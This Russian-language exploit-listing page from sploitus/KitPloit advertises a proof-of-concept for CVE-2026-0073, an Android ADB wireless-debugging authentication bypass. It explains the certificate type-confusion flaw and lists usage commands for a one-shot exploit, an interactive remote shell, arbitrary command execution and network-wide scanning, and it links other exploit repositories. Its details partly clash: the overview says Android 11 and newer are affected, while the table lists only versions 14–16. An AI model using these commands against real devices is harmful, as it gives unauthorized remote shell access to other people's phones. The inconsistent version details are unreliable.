## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TC4DY-CVE-2026-0073-POC-EXPLOIT

# 🔓 CVE-2026-0073 - Обход аутентификации беспроводной отладки ADB в Android
   
> **Zero-Click | Удалённая оболочка | Сетевой сканер | Образовательный инструмент для исследований в области безопасности**
* * *
## 🎯 Обзор
CVE-2026-0073 — критическая уязвимость обхода аутентификации в ADB-демоне Android, затрагивающая **беспроводную отладку** на устройствах Android 11 и новее. Ошибка находится в логике проверки TLS-сертификатов, где путаница типов в `EVP_PKEY_cmp()` позволяет злоумышленникам обойти аутентификацию, предъявив сертификат **EC P-256** или **Ed25519** устройству, настроенному с RSA-ключом.
Этот PoC демонстрирует уязвимость **только в целях авторизованных исследований безопасности и обучения.**
* * *
## ✨ Возможности
* * *
## 📱 Затронутые версии
Версия Android| Затронута
---|---
Android 14| ✅ Да
Android 15| ✅ Да
Android 16| ✅ Да
Android 13-| ❌ Нет
**Патч:** Android Security Bulletin 2026-05-01
* * *
## 📦 Установка
## 🚀 Примеры использования
root@kitploit:~
#Basic - One Shot Exploit
python exploit.py --target 192.168.1.100
#Interactive Shell
python exploit.py -t 192.168.1.100 -i
#Execute Single Command
python exploit.py -t 192.168.1.100 -c "id" -o result.txt
#Scan Entire Network
python exploit.py --scan --interface eth0
#Manual Port + Verbose
python exploit.py -t 192.168.1.100 -p 39311 -v
#Ed25519 Certificate
python exploit.py -t 192.168.1.100 --key-type ed25519
#Non-Interactive Mode (Exit After Command)
python exploit.py -t 192.168.1.100 -c "whoami" --no-interactive
## ⚙️ Аргументы командной строки
## 🔗 Связанные эксплойты
Ознакомьтесь с другими моими репозиториями эксплойтов:
* CVE-2026-41940
* CVE-2026-0024061
* CVE-2026-29000